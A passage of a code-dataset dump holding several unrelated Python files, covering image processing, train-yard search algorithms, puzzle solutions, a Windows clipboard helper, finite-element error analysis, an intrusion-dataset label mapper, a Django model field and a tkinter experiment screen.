depth_max)\n\nkernel = np.ones((3, 3), np.uint8)\nimg_dst = cv2.erode(img_dst, kernel, iterations=2)\nimg_dst = cv2.dilate(img_dst, kernel, iterations=2)\n\nnlabel, img_lab = cv2.connectedComponents(img_dst)\nfor i in range(1, nlabel, 1):\n img_dst = cv2.compare(img_lab, i, cv2.CMP_EQ)\n print(i, ' / ', (nlabel - 1))\n cv2.imwrite('dst' + str(i) + '.png', img_dst)\n cv2.imshow('src', img_src)\n cv2.imshow('dst', img_dst)\n cv2.waitKey(0)\n\ncv2.destroyAllWindows()\n","repo_name":"mkoeda/opencvbook","sub_path":"OpenCVによる画像処理入門/第3版/第1刷/sampleprogram/11-3-9.py","file_name":"11-3-9.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35621026705","text":"from Yard import Yard\nfrom States import States\nimport copy\nimport time\n\n\nclass Switch:\n\n def __init__(self, _yard, _start, _end):\n\n if len(_start.state) != len(_end.state):\n raise Exception(\"Start State and Goal State Have Different Track Number\")\n\n if len(_start.state) != _yard.num_tracks:\n p\n\n end_track_position = -1\n\n for i in range(len(_end.state)):\n if \"*\" in _end.state[i]:\n end_track_position = i + 1\n break\n\n if end_track_position == -1:\n raise Exception(\"Engine Not Found in End State\")\n\n visited = []\n distance = {}\n q = [end_track_position]\n count = 0\n\n while q:\n _q = []\n for i in range(len(q)):\n if q[i] in visited:\n continue\n\n for left, right in _yard.connection:\n if left == q[i]:\n _q.append(right)\n if right == q[i]:\n _q.append(left)\n\n visited.append(q[i])\n distance[q[i]] = count\n q = _q\n count += 1\n\n self.yard = _yard\n self.start = _start\n self.end = _end\n self.end_track_position = end_track_position\n self.distance = distance\n self.found = False\n self.path = None\n\n # Write a function possible-actions that consumes a Yard (connectivity list) and a State, and\n # produces a list of all actions possible in the given train yard from the given state\n def possible_actions(self, current_state):\n engine_position = current_state.find_engine_state()\n\n if engine_position == -1:\n raise Exception(\"Engine Not Found\")\n\n result = []\n\n for left, right in self.yard.connection:\n\n if left == right:\n raise Exception(\"Track Connection Input Error\")\n\n if left == engine_position:\n result.append(\"right \" + str(engine_position) + \" \" + str(right))\n if len(current_state.state[right - 1]) != 0:\n result.append(\"left \" + str(right) + \" \" + str(engine_position))\n\n if right == engine_position:\n result.append(\"left \" + str(engine_position) + \" \" + str(left))\n if len(current_state.state[left - 1]) != 0:\n result.append(\"right \" + str(left) + \" \" + str(engine_position))\n\n return result\n\n # Consumes an Action and a State and produces the new State that\n # will result after actually carrying out the input move in the input state.\n def result(self, action, current_state):\n new_state = copy.deepcopy(current_state)\n action_args = action.split(' ')\n\n if len(action_args) != 3:\n raise Exception(\"Action Args Usage: 'string:Direction(left, right) int:source_track int:target_track'\")\n\n if action_args[0] not in ['left', 'right']:\n raise Exception(\"Invalid State Moving Direction \" + action_args[0])\n\n direction, source, target = action_args[0], int(action_args[1]), int(action_args[2])\n\n if source is None or target is None:\n raise Exception(\"Invalid Source or Target Position\")\n\n connected_track = False\n\n for left, right in self.yard.connection:\n if direction == 'left' and left == target and right == source:\n new_state.move(direction, source, target)\n connected_track = True\n break\n elif direction == 'right' and left == source and right == target:\n new_state.move(direction, source, target)\n connected_track = True\n break\n\n if not connected_track:\n raise Exception(\"Source and Target are NOT Connected\")\n\n return new_state\n\n # Consumes a State and produces a list of all states that\n # can be reached in one Action from the given state.\n def expand(self, current_state):\n result = []\n possible_actions = self.possible_actions(current_state)\n\n for action in possible_actions:\n result.append(self.result(action, current_state))\n\n return result\n\n # Produces a list of Actions that will take the cars in the initial state into the goal state.\n # Use a blind (uninformed) search method. This is a NP Problem. For optimality I use an array\n # to record a set of visited state. Return none if goal state can't be reach.\n def blind_search(self):\n if self.start == self.end:\n return self.start\n\n visited = [self.start]\n q = self.expand(self.start)\n\n while q:\n _q = []\n for path in q:\n if path in visited:\n continue\n\n if path == self.end:\n return path\n\n _q += self.expand(path)\n visited.append(path)\n\n q = _q\n\n return None\n\n # The First Heuristic. Calculate How Many Total Distance of Each Car From End State\n def calculate_heuristic(self, current_state):\n result = 0\n\n for i in range(len(current_state.state)):\n if i + 1 == self.end_track_position:\n for j in range(1, len(current_state.state[i])):\n if ord(current_state.state[i][j]) - ord(current_state.state[i][j - 1]) != 1:\n result += 1\n else:\n result += self.distance[i + 1] * len(current_state.state[i])\n\n return result\n\n def dfs(self, path, cost, visited):\n if self.found:\n return\n\n if len(path) == visited[-1].cost and path[-1] == visited[-1]:\n self.found = True\n self.path = path[:]\n\n for v in filter(lambda x: x.cost == cost, visited):\n for _p in self.expand(v):\n if _p in visited:\n path.append(_p)\n self.dfs(path, cost + 1, visited)\n path.pop()\n\n # Search with Heuristic\n def a_star(self):\n if self.start == self.end:\n return self.start\n\n visited = [self.start]\n q = self.expand(self.start)\n\n while q:\n q.sort(key=lambda x: x.cost + self.calculate_heuristic(x), reverse=True)\n path = q.pop()\n while path in visited:\n path = q.pop()\n if path == self.end:\n visited.append(path)\n break\n q += self.expand(path)\n visited.append(path)\n\n self.dfs([], 0, visited)\n\n\nprint(\"Processing Test Data\")\n\n########################################################################\n# #\n# Test Data #\n# #\n########################################################################\nyard = Yard([(1, 2), (1, 3), (3, 5), (4, 5), (2, 6), (5, 6)])\nstart = States([['*'], ['e'], [], ['b', 'c', 'a'], [], ['d']])\nend = States([['*', 'a', 'b', 'c', 'd', 'e'], [], [], [], [], []])\nswitch = Switch(yard, start, end)\n\nyard2 = Yard([(1, 5), (1, 2), (2, 3), (2, 4)])\nstart2 = States([['*'], ['d'], ['b'], ['a', 'e'], ['c']])\nend2 = States([['*', 'a', 'b', 'c', 'd', 'e'], [], [], [], []])\nswitch2 = Switch(yard2, start2, end2)\n\nyard3 = Yard([(1, 2), (1, 3)])\nstart3 = States([['*'], ['a'], ['b']])\nend3 = States([['*', 'a', 'b'], [], []])\nswitch3 = Switch(yard3, start3, end3)\n\nyard4 = Yard([(1, 2), (1, 3), (1, 4)])\nstart4 = States([['*'], ['a'], ['b', 'c'], ['d']])\nend4 = States([['*', 'a', 'b', 'c', 'd'], [], [], []])\nswitch4 = Switch(yard4, start4, end4)\n\nyard5 = Yard([(1, 2), (1, 3), (1, 4)])\nstart5 = States([['*'], ['a'], ['c', 'b'], ['d']]) # Note c and b out of order\nend5 = States([['*', 'a', 'b', 'c', 'd'], [], [], []])\nswitch5 = Switch(yard5, start5, end5)\n\nprint(\"Start Testing\")\nstart_time = time.time()\n\n########################################################################\n# #\n# Test Possible Path #\n# #\n########################################################################\n# print(switch.possible_actions(start))\n# print(switch2.possible_actions(start2))\n# print(switch3.possible_actions(start3))\n# print(switch4.possible_actions(start4))\n# print(switch5.possible_actions(start5))\n\n\n########################################################################\n# #\n# Test Move Track #\n# #\n########################################################################\n# print(start)\n# print(switch.result(\"left 2 1\", start))\n# print(switch.result(\"right 1 2\", start))\n\n\n########################################################################\n# #\n# Test Possible Track #\n# #\n########################################################################\n# print(start)\n# for state in switch.expand(start):\n# print(\"Possible Tracks for Start: \" + str(state))\n# print(start2)\n# for state in switch2.expand(start2):\n# print(\"Possible Tracks for Start2 in First Expansion: \" + str(state))\n# for next_state in switch2.expand(state):\n# print(\"Possible Tracks for Start2 in Second Expansion: \" + str(next_state))\n\n\n########################################################################\n# #\n# Test Blind(Uninformed) Search #\n# #\n########################################################################\n# print(switch3.blind_search())\n# print(switch4.blind_search())\n# print(switch5.blind_search())\n\n\n########################################################################\n# #\n# Test Heuristic #\n# #\n########################################################################\n# print(start, \". Heuristic value: \", switch.calculate_heuristic(start))\n# print(start2, \". Heuristic value: \", switch2.calculate_heuristic(start2))\n# print(start3, \". Heuristic value: \", switch3.calculate_heuristic(start3))\n# print(start4, \". Heuristic value: \", switch4.calculate_heuristic(start4))\n# print(start5, \". Heuristic value: \", switch5.calculate_heuristic(start5))\n\n\n########################################################################\n# #\n# Test A* Search #\n# #\n########################################################################\n# print(\"Switch 1: The First Possible Way\")\n# switch.a_star()\n# for p in switch.path:\n# print(p)\n# print(\"Switch 2: The First Possible Way\")\n# switch2.a_star()\n# for p in switch2.path:\n# print(p)\n# print(\"Switch 3: The First Possible Way\")\n# switch3.a_star()\n# for p in switch3.path:\n# print(p)\n# print(\"Switch 4: The First Possible Way\")\n# switch4.a_star()\n# for p in switch4.path:\n# print(p)\n# print(\"Switch 5: The First Possible Way\")\n# switch5.a_star()\n# for p in switch5.path:\n# print(p)\n\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n\n########################################################################\n# #\n# A* Result #\n# #\n########################################################################\n# print(switch.a_star())\n\n# print(switch2.a_star())\n# Current State Are [['*', 'a', 'b', 'c', 'd', 'e'], [], [], [], []] with Cost 16\n# --- 95.16633439064026 seconds ---\n\n\n","repo_name":"udcymen/Train-Switch","sub_path":"Switch.py","file_name":"Switch.py","file_ext":"py","file_size_in_byte":12507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7774577018","text":"from aoc_python.utils import load_stripped_lines\n\n\ndef game_outcome(opponent: str, me: str) -> str:\n if (\n (opponent == \"A\" and me == \"X\")\n or (opponent == \"B\" and me == \"Y\")\n or (opponent == \"C\" and me == \"Z\")\n ):\n return \"draw\"\n\n if (\n (opponent == \"A\" and me == \"Y\")\n or (opponent == \"B\" and me == \"Z\")\n or (opponent == \"C\" and me == \"X\")\n ):\n return \"win\"\n return \"loss\"\n\n\ndef get_my_strat(opponent: str, end: str) -> str:\n if opponent == \"A\" and end == \"X\": # rock\n return \"Z\"\n if opponent == \"A\" and end == \"Y\":\n return \"X\"\n if opponent == \"A\" and end == \"Z\":\n return \"Y\"\n if opponent == \"B\" and end == \"X\": # paper\n return \"X\"\n if opponent == \"B\" and end == \"Y\":\n return \"Y\"\n if opponent == \"B\" and end == \"Z\":\n return \"Z\"\n if opponent == \"C\" and end == \"X\": # scissors\n return \"Y\"\n if opponent == \"C\" and end == \"Y\":\n return \"Z\"\n if opponent == \"C\" and end == \"Z\":\n return \"X\"\n\n\ndef score_game(game: str) -> int:\n opponent, end = game.split(\" \")\n me = get_my_strat(opponent, end)\n\n _outcome = game_outcome(opponent, me)\n\n my_score = None\n if me == \"X\":\n my_score = 1\n elif me == \"Y\":\n my_score = 2\n elif me == \"Z\":\n my_score = 3\n else:\n raise ValueError(\"my score\")\n\n outcome = None\n if _outcome == \"win\":\n outcome = 6\n elif _outcome == \"draw\":\n outcome = 3\n elif _outcome == \"loss\":\n outcome = 0\n else:\n raise ValueError(\"outcome\")\n\n return my_score + outcome\n\n\nif __name__ == \"__main__\":\n games = load_stripped_lines(\"inputs/02_1\")\n\n game_scores = [score_game(x) for x in games]\n\n print(sum(game_scores))\n","repo_name":"mullevik/advent-of-code","sub_path":"2022/python/aoc_python/day_02.py","file_name":"day_02.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23826261718","text":"import ctypes\nfrom enum import Enum\nfrom enum import EnumMeta\nfrom typing import Any\nfrom typing import List\nfrom typing import Optional\n\nfrom clipboard._c_interface import CF_HTML\nfrom clipboard._c_interface import CF_RTF\nfrom clipboard._c_interface import EnumClipboardFormats\nfrom clipboard._c_interface import GetClipboardFormatNameA\n\n\nclass ExtendedEnum(EnumMeta):\n def __contains__(cls, item: Any):\n return any(\n [\n item in cls.names, # type: ignore\n item in cls.values, # type: ignore\n item in ClipboardFormat.__members__.values(),\n ]\n )\n\n\nclass ClipboardFormat(Enum, metaclass=ExtendedEnum):\n CF_TEXT = 1\n CF_UNICODETEXT = 13\n CF_LOCALE = 16\n\n CF_HTML = CF_HTML\n CF_RTF = CF_RTF\n HTML_Format = 49418\n\n text = CF_UNICODETEXT # alias\n html = HTML_Format # alias\n HTML = html # alias\n rtf = CF_RTF # alias\n\n @classmethod # type: ignore\n @property\n def values(cls):\n return [i.value for i in cls]\n\n @classmethod # type: ignore\n @property\n def names(cls):\n return [i.name for i in cls]\n\n def __str__(self):\n return f\"{str(self.value)} {str(self.name)}\"\n\n def __eq__(self, other):\n if isinstance(self, type(other)):\n return self.name == other.name and self.value == other.value\n elif isinstance(other, int):\n return self.value == other\n else:\n return False\n\n\ndef get_clipboard_formats(formats: List[int] = None) -> List[int]:\n \"\"\"Return all available clipboard formats on clipboard.\n\n First format is the format on the clipboard, depending on your system.\n \"\"\"\n if formats is None:\n formats = [EnumClipboardFormats(0)]\n\n last_format: int = formats[-1]\n if last_format == 0:\n return formats[:-1]\n else:\n return formats + [EnumClipboardFormats(last_format)]\n\n\ndef get_format_name(format_code: int) -> Optional[str]:\n \"\"\"Get the name of the format by it's number.\n\n C function does not work for standard types (e.g. 1 for CF_TEXT).\n So, this function will use ClipboardFormat for those in the standard.\n \"\"\"\n\n # Built-In\n if format_code in ClipboardFormat.values: # type: ignore\n return ClipboardFormat(format_code).name\n\n max_buffer_length: int = 100\n\n buffer: ctypes.Array[ctypes.c_char] = ctypes.create_string_buffer(\n b\" \" * 200\n )\n return_code: int = GetClipboardFormatNameA(\n format_code, ctypes.byref(buffer), max_buffer_length\n )\n\n # Failed\n if return_code == 0:\n return None\n\n format_name: str = buffer.value.decode()\n\n return format_name\n","repo_name":"AceofSpades5757/clip-util","sub_path":"src/clipboard/formats.py","file_name":"formats.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31842961965","text":"import sys\nsys.setrecursionlimit(25000)\nn, parents = int(input()), [int(i) for i in input().split()]\na = [[] for i in range(n + 1)]\nfor i in range(n):\n a[parents[i]] += [i]\n\nroot=-1\ndef search_height(root):\n height = 0\n for child in a[root]:\n height = max(height,search_height(child)+1)\n return height\nprint(search_height(root))","repo_name":"scarlettnik/onedaycourse","sub_path":"DataStructures/1-2-2.py","file_name":"1-2-2.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40709223414","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\n\nimport scipy.io as sio\n\nfrom fealpy.mesh.meshio import load_mat_mesh, write_mat_mesh, write_mat_linear_system\nfrom fealpy.mesh.simple_mesh_generator import rectangledomainmesh \nfrom fealpy.mesh.simple_mesh_generator import triangle, unitsquaredomainmesh\n\nfrom fealpy.functionspace.tools import function_space \nfrom fealpy.femmodel.BiharmonicFEMModel import BiharmonicRecoveryFEM \nfrom fealpy.boundarycondition.BoundaryCondition import DirichletBC\nfrom fealpy.solver import solve1\nfrom fealpy.functionspace.function import FiniteElementFunction\nfrom fealpy.erroranalysis.PrioriError import L2_error, div_error, H1_semi_error\nfrom fealpy.model.BiharmonicModel2d import SinSinData, BiharmonicData2, BiharmonicData3, BiharmonicData4, BiharmonicData5 \n\nm = int(sys.argv[1]) \nsigma = int(sys.argv[2]) \nmeshtype = int(sys.argv[3])\n\nif m == 1:\n model = SinSinData()\n box = [0, 1, 0, 1]\nelif m == 2:\n model = BiharmonicData2(1.0,1.0)\n box = [0, 1, 0, 1]\nelif m == 3:\n model = BiharmonicData3()\n box = [0, 1, 0, 1]\nelif m == 4:\n model = BiharmonicData4()\n box = [0, 1, 0, 1]\nelif m == 5:\n model = BiharmonicData5()\n box = [-1, 1, -1, 1]\n\nmaxit = 4\ndegree = 1\nerror = np.zeros((maxit,), dtype=np.float)\nderror = np.zeros((maxit,), dtype=np.float)\ngerror = np.zeros((maxit,), dtype=np.float)\nH1Serror = np.zeros((maxit,), dtype=np.float)\nNdof = np.zeros((maxit,), dtype=np.int)\n\n\nh0 = 0.025\ndata = sio.loadmat('solution.mat')\nfor i in range(maxit):\n mesh = triangle(box, h0/2**i)\n V = function_space(mesh, 'Lagrange', degree)\n V2 = function_space(mesh, 'Lagrange_2', degree)\n uh = FiniteElementFunction(V)\n ruh = FiniteElementFunction(V2)\n\n uh[:] = data['uh'+str(i)].reshape(-1)\n\n fem = BiharmonicRecoveryFEM(V, model, sigma=sigma, rtype='inv_area')\n fem.recover_grad(uh, ruh)\n\n Ndof[i] = V.number_of_global_dofs() \n error[i] = L2_error(model.solution, uh, order=4)\n derror[i] = div_error(model.laplace, ruh, order=4)\n gerror[i] = L2_error(model.gradient, ruh, order=5)\n H1Serror[i] = H1_semi_error(model.gradient, uh, order=5)\n\nprint(Ndof)\nprint('L2 error:\\n', error)\norder = np.log(error[0:-1]/error[1:])/np.log(2)\nprint('order:\\n', order)\n\nprint('div error:\\n', derror)\norder = np.log(derror[0:-1]/derror[1:])/np.log(2)\nprint('order:\\n', order)\n\nprint('revover gradient error:\\n', gerror)\norder = np.log(gerror[0:-1]/gerror[1:])/np.log(2)\nprint('order:\\n', order)\n\nprint('gradient error:\\n', H1Serror)\norder = np.log(H1Serror[0:-1]/H1Serror[1:])/np.log(2)\nprint('order:\\n', order)\n\n","repo_name":"weihuayi/fealpy","sub_path":"example/oldexample/oldexample/Matlab.py","file_name":"Matlab.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"37"} +{"seq_id":"8390888298","text":"import runner\nfrom runner.utils import _get_timestr\nimport os\nimport shutil\nimport sys\nimport argparse\n\ntry:\n from .utils import *\nexcept:\n from utils import *\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--n_max_gpus', '-ng', type=int, default=2)\nparser.add_argument('--n_multiplex', '-nm', type=int, default=4)\nparser.add_argument('--seed_s', '-ss', type=int, default=0)\nparser.add_argument('--seed_e', '-se', type=int, default=20)\nparser.add_argument('-rmk', type=str, default='')\nparser.add_argument('-train', action='store_true', default=False)\n\nEXP = __import__(sys.argv[1])\nargs = EXP.add_args(parser).parse_args(sys.argv[2:])\n\nexp_dir_base = os.path.expanduser(f'~/run/liv')\nassert not os.system('df -h ' + exp_dir_base)\nlog_dir_base = os.path.join(exp_dir_base, f'{_get_timestr()}_{sys.argv[1]}_{args.rmk}')\n\nenv_pref = f'CUDA_DEVICE_ORDER=PCI_BUS_ID XLA_PYTHON_CLIENT_MEM_FRACTION={0.95/args.n_multiplex:.3f} OMP_NUM_THREADS=4 '\nroot_cmd = env_pref + EXP.base_cmd(args)\nhps = EXP.list_hps(args)\ntasks = [proc(a | {'__info': Info(root_cmd=root_cmd, log_dir_base=log_dir_base)}) for a in hps]\nprint('\\n'.join([t.cmd for t in tasks[-100:]]))\nprint(len(tasks))\nif not args.train:\n sys.exit(0)\n\nos.makedirs(log_dir_base, exist_ok=True)\nshutil.copyfile(__file__, os.path.join(log_dir_base, 'main.py'))\nshutil.copyfile(sys.argv[1] + '.py', os.path.join(log_dir_base, 'exp.py'))\nwith open(os.path.join(log_dir_base, 'exp.py'), 'a') as fout:\n print('#', ' '.join(sys.argv), file=fout)\nwith open(os.path.join(log_dir_base, 'NAME'), 'w') as fout:\n print(args.rmk, file=fout)\nr = runner.Runner(\n n_max_gpus=args.n_max_gpus, n_multiplex=args.n_multiplex, n_max_retry=-1)\nr.run_tasks(tasks)\nwith open(os.path.join(log_dir_base, 'COMPLETE'), 'w') as fout:\n fout.write('.')\n","repo_name":"meta-inf/fil","sub_path":"scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42035576342","text":"import os\nimport csv\nimport numpy as np\n\nR2L = ['ftp_write', 'guess_passwd', 'imap', 'multihop', 'named', 'phf', 'sendmail', 'snmpgetattack', 'snmpguess', 'spy',\n 'warezclient', 'warezmaster', 'xlock', 'xsnoop', 'httptunnel']\nDOS = ['back', 'land', 'mailbomb', 'neptune', 'pod', 'processtable', 'smurf', 'teardrop', 'udpstorm', 'apache2']\nProbe = ['ipsweep', 'mscan', 'nmap', 'portsweep', 'saint', 'satan']\nU2R = ['buffer_overflow', 'loadmodule', 'perl', 'ps', 'rootkit', 'sqlattack', 'xterm']\ndef get_data(source,target):\n data_file = open(target, 'w', newline='')\n with open(source,'r') as data_source:\n csv_reader=csv.reader(data_source)\n csv_writer=csv.writer(data_file)\n for row in csv_reader:\n temp_line=row #将每行数据存入temp_line数组里\n temp_line[41]=temp_line[41].strip('.')\n if temp_line[41] in R2L:\n temp_line[41]=1\n elif temp_line[41] in DOS:\n temp_line[41]=2\n elif temp_line[41] in Probe:\n temp_line[41]=3\n elif temp_line[41] in U2R:\n temp_line[41]=4\n elif temp_line[41] =='normal':\n temp_line[41] =0\n csv_writer.writerow(temp_line)\n #输出每行数据中所修改后的状态\n data_file.close()\ndef readData(path):\n data=[]\n with open(path,'r') as data_source:\n csv_reader=csv.reader(data_source)\n for row in csv_reader:\n temp_line=row\n data.append(temp_line)\n return data\ndef four_data(source,target):\n data_file = open(target, 'w')\n csv_writer = csv.writer(data_file)\n # data_file = open(target, 'w')\n with open(source, 'r') as f:\n ff = f.read()\n item=ff.split(',')\n for i in range(len(item)):\n if item[i] in R2L:\n item[i] = 1\n elif item[i] in DOS:\n item[i] = 2\n elif item[i] in Probe:\n item[i] = 3\n elif item[i] in U2R:\n print(item[i])\n item[i] = 4\n print(i)\n elif item[i] == 'normal':\n item[i] = 0\n csv_writer.writerow(item)\n #输出每行数据中所修改后的状态\n data_file.close()\nif __name__ == '__main__':\n # path='./data/KDDTrain.txt'\n # path1='./data/train1.txt'\n # get_data(path,path1)\n get_data('./data/kddcup991.txt','./data/kddcup.txt')","repo_name":"wangyingying625/FL-detection","sub_path":"bak/txtHandle.py","file_name":"txtHandle.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"35200364351","text":"from hashlib import md5\nfrom io import BytesIO\nimport torch\nimport time\nimport numpy as np\n\n\nclass LinearSchedule(object):\n def __init__(self, eps_begin, eps_end, nsteps):\n self.epsilon = eps_begin\n self.eps_begin = eps_begin\n self.eps_end = eps_end\n self.nsteps = nsteps\n\n def update(self, t):\n self.epsilon = np.interp(t, [0, self.nsteps], [self.eps_begin, self.eps_end])\n\n\ndef np2torch(x, device, cast_double_to_float=True):\n \"\"\"\n Utility function that accepts a numpy array and does the following:\n 1. Convert to torch tensor\n 2. Move it to the GPU (if CUDA is available)\n 3. Optionally casts float64 to float32 (torch is picky about types)\n \"\"\"\n x = torch.from_numpy(x).to(device)\n if cast_double_to_float and x.dtype is torch.float64:\n x = x.float()\n return x\n\n\ndef check_network_identical(network1, network2):\n \"\"\"Check if two networks are identical.\n\n Args:\n network1 (torch.nn.Module): The first network.\n network2 (torch.nn.Module): The second network.\n\n Returns:\n bool: True if the two networks are identical, False otherwise.\n\n \"\"\"\n buffer = BytesIO()\n torch.save(network1.state_dict(), buffer)\n md5_1 = md5(buffer.getbuffer()).hexdigest()\n\n buffer = BytesIO()\n torch.save(network2.state_dict(), buffer)\n md5_2 = md5(buffer.getbuffer()).hexdigest()\n\n return md5_1 == md5_2\n\n\ndef check_network_weights_loaded(network, weights_file):\n \"\"\"Check if the network is identical to the weights file.\n\n Args:\n network (torch.nn.Module): The network.\n weights_file (str): The path to the weights file.\n\n Returns:\n bool: True if the network is identical to the weights file, False\n otherwise.\n\n \"\"\"\n buffer = BytesIO()\n torch.save(network.state_dict(), buffer)\n md5_1 = md5(buffer.getbuffer()).hexdigest()\n\n with open(weights_file, \"rb\") as f:\n b = f.read() # read file as bytes\n md5_2 = md5(b).hexdigest()\n return md5_1, md5_2\n\n\nimport time\nimport datetime\n\n_last_tick = None\n_avg_epoch_time = 0.00001\n# invoke at the beginning of each epoch\ndef estimate_training_time(i_episode, total_episode):\n global _last_tick, _avg_epoch_time\n\n if not _last_tick: # i_episode == 0\n _last_tick = time.time()\n return \"estimating...\"\n\n # i_episode >=1\n now = time.time()\n dt = now - _last_tick\n _last_tick = now\n\n _avg_epoch_time += (dt - _avg_epoch_time) / i_episode\n\n remaing_training_time = int((total_episode - i_episode) * _avg_epoch_time)\n return str(datetime.timedelta(seconds=remaing_training_time))\n","repo_name":"mebusy/dqn_test","sub_path":"lqn_tutor/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28894345303","text":"import pytest\nfrom .ising import ising_1d\n\n\n# Have number of qubits large enough to have size number of unique Pauli ops.\ndef test_ising_no_neigh():\n ham = ising_1d(1, 1.0, 1.0)\n expected = {\"x\": 1.0}\n assert ham == expected\n\n\ndef test_ising_one_neigh():\n ham = ising_1d(2, energy_prefactor=1.0, external_field=2.0, normalize=True)\n expected = {\"xi\": 2.0, \"ix\": 2.0, \"zz\": 1.0}\n expected = {p: v / sum(expected.values()) for p, v in expected.items()}\n\n assert ham == expected\n\n\ndef test_ising_two_neigh():\n ham = ising_1d(3, energy_prefactor=1.0, external_field=2.0, normalize=True)\n expected = {\n \"xii\": 2.0,\n \"ixi\": 2.0,\n \"iix\": 2.0,\n \"zzi\": 1.0,\n \"izz\": 1.0,\n }\n expected = {p: v / sum(expected.values()) for p, v in expected.items()}\n\n assert ham == expected\n","repo_name":"Simultonian/hamilutor-qiskit","sub_path":"src/hamiltonian/physics/test_ising_ham.py","file_name":"test_ising_ham.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"29143318252","text":"from django.db import models\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\nclass OrderField(models.PositiveIntegerField):\n def __init__(self, for_fields=None, *args, **kwargs):\n self.for_fields = for_fields\n super(OrderField, self).__init__(*args, **kwargs)\n\n def pre_save(self, model_instance, add):\n if getattr(model_instance, self.attname) is None:\n # Значение пусто.\n try:\n qs = self.model.objects.all()\n if self.for_fields:\n # Фильтруем объекты с такими же значениями полей,\n # перечисленных в \"for_fields\".\n query = {field: getattr(model_instance, field) for field in self.for_fields}\n qs = qs.filter(**query)\n # Получаем заказ последнего объекта.\n last_item = qs.latest(self.attname)\n value = last_item.order + 1\n except ObjectDoesNotExist:\n value = 0\n setattr(model_instance, self.attname, value)\n return value\n else:\n return super(OrderField, self).pre_save(model_instance, add)\n# Это класс поля OrderField. Он наследуется от PositiveIntegerField, который определен в Django. Конструктор принимает\n# необязательный параметр for_fields, чтобы определить поле родительского объекта, относительно которого\n# будет вычислен порядок.\n# Мы переопределили метод pre_save() класса PositiveIntegerField. Он выполняется перед тем, как Django сохранит поле\n# в базу данных. В этом методе мы выполняем следующие действия:\n# 1) проверяем, существует ли такое значение для объектов модели. Для того чтобы получить имя поля, по которому оно было\n# определено в модели, обращаемся к атрибуту self.attname. Если значение поля равно None, рассчитываем, чему оно должно\n# быть равно:\n# формируем QuerySet, чтобы получить все объекты модели. Класс мо-\n# дели, для которой определено текущее поле, получаем через запись\n# self.model;\n# - если был задан параметр for_fields, получаем для текущего объекта значения этих полей и фильтруем QuerySet по ним.\n# Так мы получим только те объекты, которые принадлежат одному родительскому, например, все модули курса;\n# - получаем объект с максимальным значением порядкового номера из результата фильтрации с помощью записи\n# last_item = qs.latest(self.attname). Если не найдено ни одного объекта, присваиваем текущему порядковый номер 0;\n# - если объект найден, то присваиваем текущему номер, больший на единицу;\n# 2) если поле заполнено пользователем, ничего не делаем.\n# !ВАЖНО! Когда вы создаете собственные поля для моделей, старайтесь делать их универсальными. Избегайте явного задания\n# данных или полей моделей, от которых они могут зависеть. Поля должны быть применимы не для одной модели, а для всех.\n\n\n\n\n","repo_name":"KonstantinovD/educa","sub_path":"courses/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23607389872","text":"import tkinter as tk\r\nfrom tkinter import *\r\n\r\nfirst = tk.Tk()\r\nfirst.title(\"Serial Position Effect\")\r\n\r\nbase = tk.Canvas(first,bg='light cyan', width = 800, height = 400)\r\nbase.pack()\r\n\r\nhead = tk.Label(first, text='Instructions')\r\nhead.config(font=('Times', 30),bg='light cyan')\r\nbase.create_window(400, 70, window=head)\r\n\r\nin1 = tk.Label(first, text='1. Once you click the get started button, a window appears displaying a list of 10 animals.')\r\nin1.config(font=('Times', 15),bg='light cyan')\r\nbase.create_window(400, 150, window=in1)\r\n\r\nin2 = tk.Label(first, text='2. It appears only for 10 seconds. Try to memorize the animals displayed in the list.')\r\nin2.config(font=('Times', 15),bg='light cyan')\r\nbase.create_window(374, 200, window=in2)\r\n\r\nin3 = tk.Label(first, text='3. After completion of 10 seconds, another window appears which contains 18 animals.')\r\nin3.config(font=('Times', 15),bg='light cyan')\r\nbase.create_window(393, 250, window=in3)\r\n\r\nin4 = tk.Label(first, text='4. Select the previously memorized animals and click on the button below.')\r\nin4.config(font=('Times', 15),bg='light cyan')\r\nbase.create_window(340, 300, window=in4)\r\n\r\ndef click_me():\r\n first.destroy()\r\n import main\r\n\r\nz = Button(first, text=\"Get Started\", command=click_me)\r\nz.config(font=('georgia', 15),fg='white smoke',bg='black')\r\nz.pack(padx=15, pady=15)\r\nfirst.mainloop()","repo_name":"KrishnaPoojithaV/Serial-Position-Effect-HCI","sub_path":"first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2670945021","text":"import pycuda.driver as cuda\nfrom pycuda.tools import PageLockedMemoryPool\nimport numpy as np\nimport time\nimport ctypes\nimport pdb\nfrom queue import Queue\nfrom threading import Thread\nfrom pycuda.tools import make_default_context\nimport matplotlib.pyplot as 